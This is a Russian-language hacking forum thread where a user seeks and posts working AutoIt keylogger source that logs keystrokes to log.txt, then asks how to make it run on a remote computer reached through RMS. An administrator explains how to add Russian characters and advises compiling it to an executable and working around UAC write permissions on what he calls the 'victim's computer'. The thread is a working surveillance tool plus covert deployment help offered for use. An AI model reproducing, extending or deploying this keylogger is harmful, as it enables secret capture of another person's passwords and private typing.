• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Ищу простой кейлогер (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
нужен простенький кейлогер, чтобы при включении в папке появлялся текстовик с логами клавишь blush1
был такой, но почему-то перестал работать вместе с кейлогером из пунто свитчера :с
буду очень благодарен за помощь :)
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
Код:
#include<misc.au3>
$dll=DllOpen("user32.dll")
while 1
Dim $array[70]=[' ','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','[F1]','[F2]','[F3]','[F4]','[F5]','[F6]','[F7]','[F8]','[F9]','[F10]','[F11]','[F12]','e','+',',','-','.','u','o','\',"'",'i','[INVIO]','[SHIFT]','[CTRL]','[ALT]','[ESC]','[SCREEN]','[CANC]','[FRECCIA SINISTRA]','[FRECCIA SU]','[FRECCIA DESTRA]','[FRECCIA GIU]']
        Dim $hex[70]=['20','41','42','43','44','45','46','47','48','49','4A','4B','4C','4D','4E','4F','50','51','52','53','54','55','56','57','58','59','5A','30','31','32','33','34','35','36','37','38','39','70','71','72','73','74','75','76','77','78','79','7A','7B','BA','BB','BC','BD','BE','BF','C0','DC','DB','DD','0D','10','11','12','1B','2C','2E','25','26','27','28']
for $i=0 to 69
If _IsPressed($hex[$i],$dll)Then
          FileWrite ("log.txt",$array[$i])
        EndIf
        While _IsPressed($hex[$i]) = 1
        WEnd
next
WEnd
нашел кейлогер на аутоите , но он записывает только английские буквы, мб кому-то не сложно допилить сюда русские?blush1
буду премного благодарен :)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 394
Репутация
7 884
Telegram
нашел кейлогер на аутоите , но он записывает только английские буквы, мб кому-то не сложно допилить сюда русские?blush1
буду премного благодарен :)
Ну а если самому головой подумать ?

Код:
Dim $array[70]=[' ','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','[F1]','[F2]','[F3]','[F4]','[F5]','[F6]','[F7]','[F8]','[F9]','[F10]','[F11]','[F12]','e','+',',','-','.','u','o','\',"'",'i','[INVIO]','[SHIFT]','[CTRL]','[ALT]','[ESC]','[SCREEN]','[CANC]','[FRECCIA SINISTRA]','[FRECCIA SU]','[FRECCIA DESTRA]','[FRECCIA GIU]']
        Dim $hex[70]=['20','41','42','43','44','45','46','47','48','49','4A','4B','4C','4D','4E','4F','50','51','52','53','54','55','56','57','58','59','5A','30','31','32','33','34','35','36','37','38','39','70','71','72','73','74','75','76','77','78','79','7A','7B','BA','BB','BC','BD','BE','BF','C0','DC','DB','DD','0D','10','11','12','1B','2C','2E','25','26','27','28']
for $i=0 to 69
Dim $array[70] - Инглиш алфавит, Dim $hex[70] - коды кнопок...

for $i=0 to 69
If _IsPressed($hex[$i],$dll)Then
FileWrite ("log.txt",$array[$i])

Если нажата кнопа, вывод из того массива инглиша...

Делаешь два массива:Один русские символы, второй его коды, далее тупо добавляешь код (for $i=0 to ...) и всё !Отдыхай!!!
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
спасибо, я уже и сам разорбрался :D
только вот возникла не понятная проблема , на удаленном компьютере не хочет работать не в какую ._.
ну просто не появляется log.txt и все тут, я уже и на мультиюзерность пропатчил, с учетки другой запускаешь, все пашет, запускаю с нужной учетки через рмс и log.txt не появляется Не въехал!!!
уже и другой кейлогер на аутоите нашел, и он тоже отказывается там работать, хотя на моем компьютере все работает на ура , не подскажете в чем может быть проблема? Не въехал!!!
буду очень благодарен, весь день мучаюсь с этой не понятной проблемой, антивирус снес, так что он тут не при чем Не въехал!!!
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 394
Репутация
7 884
Telegram
Проверь права, может сохраняешь файл log.txt туда где нет прав на запись, например на диск C, при включонном уак ничего несохранится нужно сохранять в папку пользователя...
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 394
Репутация
7 884
Telegram
И ещё может он незапускается на компе жертве, нужно компилировать в экзешник что-бы запустился...
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
Проверь права, может сохраняешь файл log.txt туда где нет прав на запись, например на диск C, при включонном уак ничего несохранится нужно сохранять в папку пользователя...
в экзешник скомпилировал, а вот на счет uac сейчас проверю, спасибо , на удаленном компьютере как раз только диск С есть , ну я вроде пробовал запускать в папке пользователя , но все равно не работало, сейчас попробую отключить UAC :)